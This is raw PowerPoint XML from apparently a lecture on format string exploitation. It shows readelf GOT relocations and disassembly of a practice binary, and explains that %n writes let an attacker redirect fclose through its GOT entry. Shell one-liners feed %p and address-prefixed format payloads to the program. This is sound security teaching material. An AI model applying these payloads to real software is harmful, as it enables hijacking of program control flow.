                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>AAAABBBBCCCCDDDD0x1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x414141410x424242420x434343430x44444444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x702570250x702570250x70257025</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128023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 String Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using %n, we can write to any memory address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The GOT has the addresses of dynamically linked functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>relocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> ./format-simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Relocation section '.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rel.dyn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' at offset 0x2ec contains 1 entries: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Offset     Info    Type            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Sym.Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  Sym. Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497bc  00000106 R_386_GLOB_DAT    00000000   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gmon_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Relocation section '.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rel.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' at offset 0x2f4 contains 7 entries: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Offset     Info    Type            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Sym.Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  Sym. Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497cc  00000107 R_386_JUMP_SLOT   00000000   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gmon_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497d0  00000207 R_386_JUMP_SLOT   00000000   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_start_main</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497d4  00000307 R_386_JUMP_SLOT   00000000   read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497d8  00000407 R_386_JUMP_SLOT   00000000   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497dc  00000507 R_386_JUMP_SLOT   00000000   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497e0  00000607 R_386_JUMP_SLOT   00000000   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fprintf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497e4  00000707 R_386_JUMP_SLOT   00000000   exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRP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31194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GOT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>call   804839c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fclose@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0804839c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fclose@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804839c:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80497d8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a2:       push   $0x18 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a7:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    804835c &lt;_init+0x30&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497d8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  00000407 R_386_JUMP_SLOT   00000000   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>286</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22841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 String Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, by writing into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497d8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>we control what happens after calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "AAAABBBBCCCCDDDD" + "%p" * 8'` | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>AAAABBBBCCCCDDDD0x1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x414141410x424242420x434343430x44444444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x702570250x702570250x70257025</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "AAAABBBBCCCCDDDD" + "%2\$p"'` | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>AAAABBBBCCCCDDDD0x41414141</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\xd8\x97\x04\x08BBBBCCCCDDDD" + "%2\$x"'` | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
